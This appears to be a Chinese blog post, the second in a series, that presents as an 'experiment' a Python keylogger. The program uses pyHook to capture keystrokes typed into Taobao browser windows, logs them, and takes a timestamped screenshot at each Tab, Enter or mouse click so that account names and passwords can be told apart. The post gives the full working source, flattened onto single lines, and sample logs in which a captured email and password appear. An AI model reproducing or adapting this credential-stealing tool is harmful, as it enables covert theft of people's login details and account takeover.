Python:通过获取淘宝账号和密码的实验,来看登陆方式选择的重要性(二)
在上一篇文章《Python:通过获取淘宝账号和密码的实验,来看登陆方式选择的重要性》中,通过日志记录了一些可能是用户输入的用户名或密码等信息,但如果用户在网站上输入的是其他信息,我们从中区分出敏感信息还是要花费时间来分析的,刚才想了想,将功能优化了一下。一、思路:
1、在抓取到用户输入的信息后,除了记录到日志中外,再给当前屏幕截一张图,以日期命名;
2、通过对于图片名与日志中ERROR级别对应的时间点,就可以判断内容是不是敏感信息;
3、之所以采用抓图和日志结合的方法,是因为密码在界面上不会显示出来,图片中看不到,必须结合日志,呵呵。
二、实现:
#!/usr/bin/env python# -*- coding: utf-8 -*-import pythoncomimport pyHookimport timeimport loggingimport logging.configfrom PIL import ImageGrab#日志配置文件名LOG_FILENAME = 'hook_logging.conf'#日志语句提示信息LOG_CONTENT_NAME = 'taobao_input_msg'def log_init(log_config_filename, logname):'''Function:日志模块初始化函数Input:log_config_filename:日志配置文件名lognmae:每条日志前的提示语句Output: loggerauthor: socratesblog:http://blog.csdn.net/dyx1024date:2012-02-13'''logging.config.fileConfig(log_config_filename)logger = logging.getLogger(logname)return loggerdef onMouseEvent(event):'''Function:处理鼠标左键单击事件,如果当前MSG中存放了信息,将其写入文件,因为有的用户在输入 完用户名后,不是使用TAB键切换到密码框,而是通过鼠标切换到密码输入窗口这种情况应该属于大多数网民的习惯,所以此处要判断是否通过鼠标切换了输入窗口Input:evenOutput: Tureauthor: socratesblog:http://blog.csdn.net/dyx1024date:2012-03-03'''global MSGif len(MSG) != 0:hook_logger.info('current page:%s' % event.WindowName)hook_logger.error('information:%s' % MSG)MSG = '' #屏幕抓图实现pic_name = time.strftime('%Y%m%d%H%M%S',time.localtime(time.time()))pic = ImageGrab.grab()pic.save('%s.png' % pic_name)#保存成为以日期命名的图片return Truedef onKeyboardEvent(event): "处理键盘事件"'''Function:处理键盘事件,如果当前窗口为TAOBAO页面,刚开始监控并记录用户输入因为此时用户可能准备输入用户名及密码进行登陆,所以将用户输入的所有可见的ascii字符记录下来,此处要考虑用户是否使用了TAB键或回车键来结束输入,此时要将信息记录到日志中。Input:evenOutput: Tureauthor: socratesblog:http://blog.csdn.net/dyx1024date:2012-03-03''' global MSGif event.WindowName.decode('GBK').find(u"淘宝") != -1:if (127 >= event.Ascii > 31) or (event.Ascii == 8):MSG += chr(event.Ascii)hook_logger.info('ascii:%d(%s)' % (event.Ascii, str(event.Key))) if (event.Ascii == 9) or (event.Ascii == 13):hook_logger.info('current page:%s' % event.WindowName)hook_logger.error('information:%s' % MSG)MSG = '' #屏幕抓图实现pic_name = time.strftime('%Y%m%d%H%M%S',time.localtime(time.time()))pic = ImageGrab.grab()#保存成为以日期命名的图片pic.save('%s.png' % pic_name)return Trueif __name__ == "__main__": '''Function:获取TAOBAO账号及密码,增加抓图功能Input:NONEOutput: NONEauthor: socratesblog:http://blog.csdn.net/dyx1024date:2012-03-03'''#打开日志文件#初始化日志系统hook_logger = log_init(LOG_FILENAME, LOG_CONTENT_NAME) MSG = '' #创建hook句柄hm = pyHook.HookManager()#监控鼠标hm.SubscribeMouseLeftDown(onMouseEvent)hm.HookMouse()#监控键盘hm.KeyDown = onKeyboardEventhm.HookKeyboard()#循环获取消息pythoncom.PumpMessages()
三、测试: 1、记录下来的日志内容:
INFO:ascii:105(I)INFO:ascii:112(P)INFO:ascii:104(H)INFO:ascii:111(O)INFO:ascii:110(N)INFO:ascii:101(E)INFO:ascii:52(4)INFO:ascii:115(S)INFO:current page:淘宝网 - 淘!我喜欢 - Google ChromeERROR:information:iphone4sINFO:ascii:115(S)INFO:ascii:111(O)INFO:ascii:99(C)INFO:ascii:114(R)INFO:ascii:97(A)INFO:ascii:116(T)INFO:ascii:101(E)INFO:ascii:115(S)INFO:ascii:64(2)INFO:ascii:103(G)INFO:ascii:109(M)INFO:ascii:97(A)INFO:ascii:105(I)INFO:ascii:108(L)INFO:ascii:46(Oem_Period)INFO:ascii:99(C)INFO:ascii:111(O)INFO:ascii:109(M)INFO:current page:NoneERROR:information:socrates@gmail.comINFO:ascii:57(9)INFO:ascii:56(8)INFO:ascii:55(7)INFO:ascii:54(6)INFO:ascii:53(5)INFO:ascii:52(4)INFO:ascii:51(3)INFO:ascii:50(2)INFO:ascii:49(1)INFO:ascii:113(Q)INFO:ascii:119(W)INFO:ascii:101(E)INFO:ascii:114(R)INFO:ascii:116(T)INFO:current page:NoneERROR:information:987654321qwertINFO:ascii:106(J)INFO:ascii:116(T)INFO:ascii:54(6)INFO:ascii:121(Y)INFO:current page:NoneERROR:information:jt6y
2、过滤出ERROR级别日志信息,如下:ERROR:information:iphone4sERROR:information:socrates@gmail.comERROR:information:987654321qwertERROR:information:jt6y
3、查看生成的图片:
可以看出,图片名称中的时间和日志中的时间一一对应,这样就可查看每条日志打印时当前屏幕的状态。
具体看一下每条日志对应的图片:
a.ERROR: information:iphone4s
b.ERROR: information:socrates@gmail.com
c.ERROR: information:987654321qwert (原来这行才是密码)
d ERROR: information:jt6y
页:
[1]